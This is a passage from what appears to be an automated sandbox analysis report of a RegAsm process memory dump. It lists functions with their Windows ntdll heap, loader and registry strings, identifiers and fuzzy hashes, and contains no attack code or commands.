                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                    • API String ID: 0-3061284088
                                                    • Opcode ID: 77c81129d61cff4edf272753baf3d05accc58e2251c5c74e96786b304a5ea8a3
                                                    • Instruction ID: bb83cadb138e86fa2efa75e260b141f30800238fa4dfe497bae4da36384dce65
                                                    • Opcode Fuzzy Hash: 77c81129d61cff4edf272753baf3d05accc58e2251c5c74e96786b304a5ea8a3
                                                    • Instruction Fuzzy Hash: 3E01FC33546280DEF22AE719E82AF56B7D4EF42FF8F154059E2154B661CBA8D880C560
                                                    Function 02F570C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                    • API String ID: 0-3178619729
                                                    • Opcode ID: e4947facd31e5d8a98a568f72037c126dc7f1bb4b2e530c706f36dbd85fbffad
                                                    • Instruction ID: c0ff8af125e56d0cd4251f6d330df29871a9c1304cbf3d6eeebaa69693b3804c
                                                    • Opcode Fuzzy Hash: e4947facd31e5d8a98a568f72037c126dc7f1bb4b2e530c706f36dbd85fbffad
                                                    • Instruction Fuzzy Hash: 54138D70E00665DFDB25CF68C890BA9FBF1BF49384F148199DA49AB381D734A985CF90
                                                    Function 02F51070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-3570731704
                                                    • Opcode ID: 6e43ee9cf6395c7c7a469437ab029a8a8c96334e54a615d49d6da6f30242a362
                                                    • Instruction ID: b300223134b85ef8659b3150c634c96b90a59b82395307ac8f8872a2a390b457
                                                    • Opcode Fuzzy Hash: 6e43ee9cf6395c7c7a469437ab029a8a8c96334e54a615d49d6da6f30242a362
                                                    • Instruction Fuzzy Hash: B4922A71E01268CFEB24CB18CC50BAAB7B6BF45394F0581E9EA4DA7251D734AE84CF51
                                                    Function 02F4A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: 98c5cbec82cf0c3b31a57842f858c397e89e0f7b79190077e17eb0809823bd26
                                                    • Instruction ID: 763a310f4b198ee5e82e0d10ceb64efc6c153515577a24ed5b94f6bdccc2d302
                                                    • Opcode Fuzzy Hash: 98c5cbec82cf0c3b31a57842f858c397e89e0f7b79190077e17eb0809823bd26
                                                    • Instruction Fuzzy Hash: AEC19075648382CFD711CF18C654B6ABBE4FF84788F00496AFA958B360EBB4C945CB52
                                                    Function 02F7273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02FB21D9, 02FB22B1
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02FB22B6
                                                    • .Local, xrefs: 02F728D8
                                                    • SXS: %s() passed the empty activation context, xrefs: 02FB21DE
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: 044b260b67b885255ac27048aa2bacf24777ab4275efa128e524f089a2139b28
                                                    • Instruction ID: b81d9b4143fde5c6b64c2cb7fb6ee361ac889671cb89c837481bbf81a3a7c2cc
                                                    • Opcode Fuzzy Hash: 044b260b67b885255ac27048aa2bacf24777ab4275efa128e524f089a2139b28
                                                    • Instruction Fuzzy Hash: DBA19032E002299BDB25CF55DC94BA9B3B5BF58394F1441EADE08A7251D7309E81CF90
                                                    Function 02F3F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                    • API String ID: 0-2586055223
                                                    • Opcode ID: 4681dacaad07f2b684565723458e8a80d7f4e1992f227a50c2bcdae6c9d85849
                                                    • Instruction ID: 6c0ee5bd01a81e424e5f98672ef22aacd5fcc86cd998a0a2da77e80f4dc6630a
                                                    • Opcode Fuzzy Hash: 4681dacaad07f2b684565723458e8a80d7f4e1992f227a50c2bcdae6c9d85849
                                                    • Instruction Fuzzy Hash: FE610032604284AFEB22DB28CD44F6BB7E9EF847D4F040569FB568B691D734E804CB61
                                                    Function 02FF11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                    • API String ID: 0-336120773
                                                    • Opcode ID: fc98aa685e460632249e2d6e4af1c6c4862eedc41f95b6d0267c8dc1adb5aa2e
                                                    • Instruction ID: daeef580389aff70f98d0e02613ba0aada049536f5df94f70bad4e4e35009542
                                                    • Opcode Fuzzy Hash: fc98aa685e460632249e2d6e4af1c6c4862eedc41f95b6d0267c8dc1adb5aa2e
                                                    • Instruction Fuzzy Hash: 5031AB32601144EFE751DB98C895FABB3E9EF057E8F550059E70ADB2A0D760E940CE64
                                                    Function 02F39148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                    • API String ID: 0-1391187441
                                                    • Opcode ID: 4ca454a8d0f04ec497d97aee9fea132a2cfbf7cd4b5e8234f7d4fb820d5c483b
                                                    • Instruction ID: df57fee2ad407358536037e1b596e1d49c54f46e8050d9c5dea6fcffc55f3eb5
                                                    • Opcode Fuzzy Hash: 4ca454a8d0f04ec497d97aee9fea132a2cfbf7cd4b5e8234f7d4fb820d5c483b
                                                    • Instruction Fuzzy Hash: 2131C132A00154EFEB02EB45CC89FAEB7F9EF457E8F154055EA15AB290D7B0ED40CA60
                                                    Function 02F50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 4c01b70445b46b2737a28e17c21481632b2af04995d9b1fa4e064998fe0d3741
                                                    • Instruction ID: 83a5bfbe28115d875f87af8789e1a6f4613b80b103c533b22457644ce12c95cd
                                                    • Opcode Fuzzy Hash: 4c01b70445b46b2737a28e17c21481632b2af04995d9b1fa4e064998fe0d3741
                                                    • Instruction Fuzzy Hash: A3F18971B00605DFEB15CF68C8A0B6AB7F5FF49384F1481A8EA169B391DB34E941CB90
                                                    Function 02F4B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                    • API String ID: 0-1145731471
                                                    • Opcode ID: 089398f803ce469bf3f3133ecc6475f5898da561b405c1ee920d841b5d0f3474
                                                    • Instruction ID: 6f352b22d5e1756dea96cea2600b5a655b676c01ebda2956888c970b1b958ff9
                                                    • Opcode Fuzzy Hash: 089398f803ce469bf3f3133ecc6475f5898da561b405c1ee920d841b5d0f3474
                                                    • Instruction Fuzzy Hash: 5EB1C272E156098FDB25CF69C990FADBBB6BF44388F154569EA11EB381D770E840CB10
                                                    Function 02FC368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                    • API String ID: 0-2391371766
                                                    • Opcode ID: a03aca0823cbdad0130499c139033e88426c9212029ddf826d73d16b6507ab46
                                                    • Instruction ID: 33ed00f011eb2fbf08a9aacf4a867566eca56b8960abb5a9399d054d5cd598bd
                                                    • Opcode Fuzzy Hash: a03aca0823cbdad0130499c139033e88426c9212029ddf826d73d16b6507ab46
                                                    • Instruction Fuzzy Hash: 36B1AF72A09346AFD311EE54CD80F6BB7E8AB447D4F11896DFB419B280D775E804CB92
                                                    Function 02F3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: 9081e642da5159d1d2951bc86956918c3b257c8faab846ecc4ff8d1bb74f5848
                                                    • Instruction ID: a5b685490374f18dc73116d2ae81a600b7fef1872fe4d8212bd0a6616d43c90c
                                                    • Opcode Fuzzy Hash: 9081e642da5159d1d2951bc86956918c3b257c8faab846ecc4ff8d1bb74f5848
                                                    • Instruction Fuzzy Hash: 9AA15B71D012299BEF21DF64CC88BAAB7B8FF48784F1001EADA09A7250D7359E84CF54
                                                    Function 02FD36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                    • API String ID: 0-318774311
                                                    • Opcode ID: 11f0143e1707c7a3fe69d8ffe9cc48351518cda63b1983dfce4896207d747381
                                                    • Instruction ID: 89a9c2ff98961341106efed35faf7497a19e607da3aff63a15fc379aad1d8ce0
                                                    • Opcode Fuzzy Hash: 11f0143e1707c7a3fe69d8ffe9cc48351518cda63b1983dfce4896207d747381
                                                    • Instruction Fuzzy Hash: B3816972A08745AFD3119B14C844B6AB7EAEF85794F0809A9BF819B390D774E904CF53
                                                    Function 02F7909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %$&$@
                                                    • API String ID: 0-1537733988
                                                    • Opcode ID: b25e3ca3ec7ff3648417d9d5c94e428686f3874a0bac59983ed3e48c189d6411
                                                    • Instruction ID: 3f233b9a212c0eb387d00000e8c8b8c47bc436ddc6b2b1e8d42a9cfa5d05cd11
                                                    • Opcode Fuzzy Hash: b25e3ca3ec7ff3648417d9d5c94e428686f3874a0bac59983ed3e48c189d6411
                                                    • Instruction Fuzzy Hash: F271F470A083019FD710EF24C980A6BBBEAFF85798F10491EF6A687250C7B0D805CF52
                                                    Function 0301B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0301B82A
                                                    • TargetNtPath, xrefs: 0301B82F
                                                    • GlobalizationUserSettings, xrefs: 0301B834
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                    • API String ID: 0-505981995
                                                    • Opcode ID: 151fcdf923885c989aeeb6f8719b5a7b6ba1a350a909b7b6628aeb472ecc203e
                                                    • Instruction ID: 7bb1fc8594b7de4ede4950272fc17b83e3e8c0beccd6ab59ad1c9dc1d81c9929
                                                    • Opcode Fuzzy Hash: 151fcdf923885c989aeeb6f8719b5a7b6ba1a350a909b7b6628aeb472ecc203e
                                                    • Instruction Fuzzy Hash: 6D619072D42228ABDB21DF54DC88BDAF7B9AF04750F4101E9EA08A7250CB74DE81CF90
                                                    Function 02F3F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HEAP: , xrefs: 02F9E6B3
                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02F9E6C6
                                                    • HEAP[%wZ]: , xrefs: 02F9E6A6
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                    • API String ID: 0-1340214556
                                                    • Opcode ID: 697074f5f5c2844e7c979699641ac8e3e616b59828f6efb67bd41550c0f9b9e4
                                                    • Instruction ID: 2743857eb7679eb3fe16f411e37315cb1ee9f0c7ef38b49c1514bd3f9eded0af
                                                    • Opcode Fuzzy Hash: 697074f5f5c2844e7c979699641ac8e3e616b59828f6efb67bd41550c0f9b9e4
                                                    • Instruction Fuzzy Hash: 1A51F531A00684EFE726DB68C994FAABBF9FF05784F1401A5E742CB692D774E940CB50
                                                    Function 02F716CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpAllocateTls, xrefs: 02FB1B40
                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02FB1B39
                                                    • minkernel\ntdll\ldrtls.c, xrefs: 02FB1B4A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                    • API String ID: 0-4274184382
                                                    • Opcode ID: 2177ed2f5a07e18c4b278cbe6915ff8a91d5aa89c676eccabd42a4ad292754b3
                                                    • Instruction ID: 19790645e5f85f77ec2e2d2d1f7753067381698411f88b49b833db2148fd740e
                                                    • Opcode Fuzzy Hash: 2177ed2f5a07e18c4b278cbe6915ff8a91d5aa89c676eccabd42a4ad292754b3
                                                    • Instruction Fuzzy Hash: 6A41A075E01608AFDB15DFA9CC51BAEBBFAFF49784F044119E609A7210D778A805CF90
                                                    Function 02FFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • PreferredUILanguages, xrefs: 02FFC212
                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FFC1C5
                                                    • @, xrefs: 02FFC1F1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                    • API String ID: 0-2968386058
                                                    • Opcode ID: 98a7ec069aac79215a5f75f6d1127f65121c54687ae7f5d8c935004eaf2d5711
                                                    • Instruction ID: 4da3fc785b5f429f19b4cf6f5b34266f403d04a4c4ab0a7c7a9a902a07c8a653
                                                    • Opcode Fuzzy Hash: 98a7ec069aac79215a5f75f6d1127f65121c54687ae7f5d8c935004eaf2d5711
                                                    • Instruction Fuzzy Hash: 55416F72E0022DABDB51DAD4CC91BEEB7B9EF14B84F14406BEB05B72A0D7749A44CB50
                                                    Function 02FD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                    • API String ID: 0-1373925480
                                                    • Opcode ID: fab6cdef1e6cdbaf76d7a9888359ff8a82c02e0c11a0ceff1d0c166a474dbf17
                                                    • Instruction ID: 44a0aa3b3703bc2cffe5bab151dba902b25a3b193cd1e3d22ebd3731b45ece58
                                                    • Opcode Fuzzy Hash: fab6cdef1e6cdbaf76d7a9888359ff8a82c02e0c11a0ceff1d0c166a474dbf17
                                                    • Instruction Fuzzy Hash: 9641D372E006588BEB22DBA5CD44BADB7BAEF453C4F28045ADB02FB791D7348901CB10
                                                    Function 02FC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpCheckRedirection, xrefs: 02FC488F
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02FC4899
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02FC4888
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-3154609507
                                                    • Opcode ID: 46b00aac4e4fc45d116c70113c86fbe571ded893711ca228ced844b854763f4d
                                                    • Instruction ID: 4ef176dbb6dbaa8902a6af8605062579c1460b0e84d63e4a3c25fda0765d12a2
                                                    • Opcode Fuzzy Hash: 46b00aac4e4fc45d116c70113c86fbe571ded893711ca228ced844b854763f4d
                                                    • Instruction Fuzzy Hash: 6041D332F092969FCB21DE18DA60E26B7F9AF497D0F25066DEE49D7291D330D800CB91
                                                    Function 02F733A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() passed the empty activation context data, xrefs: 02FB29FE
                                                    • Actx , xrefs: 02F733AC
                                                    • RtlCreateActivationContext, xrefs: 02FB29F9
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                    • API String ID: 0-859632880
                                                    • Opcode ID: 01c5d77725440cb7c47b8bf3c12827853db316dcfdfce4c752dded3a6b778223
                                                    • Instruction ID: 694fcbf4e08c0086f6d7110c924bf075bc1e40a39fccc4d2236d62b714a02ba7
                                                    • Opcode Fuzzy Hash: 01c5d77725440cb7c47b8bf3c12827853db316dcfdfce4c752dded3a6b778223
                                                    • Instruction Fuzzy Hash: C7314832600315AFEB2AEE59C880F96B7A9EF45794F1544BAEF059F285C730E841CB90
                                                    Function 02F71607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • DLL "%wZ" has TLS information at %p, xrefs: 02FB1A40
                                                    • LdrpInitializeTls, xrefs: 02FB1A47
                                                    • minkernel\ntdll\ldrtls.c, xrefs: 02FB1A51
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                    • API String ID: 0-931879808
                                                    • Opcode ID: c2be1c0d1ceefd07272c8cebd86c604de68e44a55fc346160f3b88cd1862b5a4
                                                    • Instruction ID: 0295a7147abe1a50daca8f23c297f1036b432baa489cf332fa3c40626d220cc7
                                                    • Opcode Fuzzy Hash: c2be1c0d1ceefd07272c8cebd86c604de68e44a55fc346160f3b88cd1862b5a4
                                                    • Instruction Fuzzy Hash: 1531E772A10200AFE7209B59CC45FAB76AEFB467D8F04015AE709A7190D774AD088F90
                                                    Function 02F81270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02F8127B
                                                    • BuildLabEx, xrefs: 02F8130F
                                                    • @, xrefs: 02F812A5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                    • API String ID: 0-3051831665
                                                    • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                    • Instruction ID: 7b42eeaef9d1a7389fee5b4500256ea87c1b50a333cf52e60649744d676f1cd3
                                                    • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                    • Instruction Fuzzy Hash: 25317E72A00559ABDB12ABA5CC44EEFFBBAEB84794F004165EB14A71A0D7309A05CF60
                                                    Function 02FC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializationFailure, xrefs: 02FC20FA
                                                    • Process initialization failed with status 0x%08lx, xrefs: 02FC20F3
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02FC2104
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2986994758
                                                    • Opcode ID: a82bb3802a893fd4b6dcac3dfc99be2c6c7531a22848e4dd6765873631e7f88d
                                                    • Instruction ID: e88db53eeebe147a4d8cd295a633d1a6024b61b9701976b0a857c737c3dbbc97
                                                    • Opcode Fuzzy Hash: a82bb3802a893fd4b6dcac3dfc99be2c6c7531a22848e4dd6765873631e7f88d
                                                    • Instruction Fuzzy Hash: 0AF0C235A41219ABF724EA48CD52FDA376DEB42BD4F600069FB0077285D6B4E904CA91
                                                    Function 02F503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: #%u
                                                    • API String ID: 48624451-232158463
                                                    • Opcode ID: 07a574905fc70d3758351ffac8b245d799dd1869a84f7629b8d2bbbb05685d41
                                                    • Instruction ID: 60d2804bf251b06ccf1156e74072a027027e54ca2c15e64df7bbe8ee4cbb4720
                                                    • Opcode Fuzzy Hash: 07a574905fc70d3758351ffac8b245d799dd1869a84f7629b8d2bbbb05685d41
                                                    • Instruction Fuzzy Hash: 09715DB1E0015A9FDB01DF98C990BAEB7F9EF08784F154069EA05E7251EB74ED41CB60
                                                    Function 02F552A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: a8437d65066a1454f8159fd39db883331db7096f254f0950e95503a8c66ab4cd
                                                    • Instruction ID: 00bbe8bc12d68da8a3cff0762298a165eed7232d7f79316f75792232780de1ff
                                                    • Opcode Fuzzy Hash: a8437d65066a1454f8159fd39db883331db7096f254f0950e95503a8c66ab4cd
                                                    • Instruction Fuzzy Hash: F4328DB5A083618BCB248F15C490B3EB7E5EF84788F58491EFF959B290E734D944CB92
                                                    Function 0300A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1908142861.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_2f10000_RegAsm.jbxd
                                                    Similarity
